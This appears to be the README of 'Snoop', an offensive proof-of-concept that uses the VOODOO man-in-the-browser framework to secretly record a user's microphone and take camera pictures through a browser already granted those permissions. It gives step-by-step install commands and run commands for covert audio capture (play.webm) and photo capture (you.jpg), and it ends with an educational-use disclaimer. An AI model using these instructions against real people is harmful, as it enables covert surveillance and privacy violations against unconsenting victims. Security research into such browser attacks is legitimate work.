TCC restricts access to the device camera and microphone to protect user data from unauthorized access.
But... If you trusted your browser with your microphone or camera, Snoop can show you how a man-in-the-browser attack can secretly be recording you.
If you don't have VOODOO installed
$: sudo gem install get-voodoo
OR
$: gem install get-voodoo --user-install
When installation without sudo
make sure that /Users/[user]/.gem/ruby/[version]/bin
is in your PATH
.
Clone or download the repository, and run the voodoo template
command.
$: git clone [email protected]:breakpointHQ/snoop.git
Recording audio
$: voodoo template ./snoop -o play.webm
The save
parameter can be used to choose how often (in milliseconds) audio data will be saved to disk.
$: voodoo template ./snoop -o play.webm --params save:1000
Taking a picture
$: voodoo template ./snoop/camera -o you.jpg
The size
parameter can be used to set the size in pixels of the captured picture.
$: voodoo template ./snoop/camera -o you2.jpg --params size:1000
Usage of this code for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.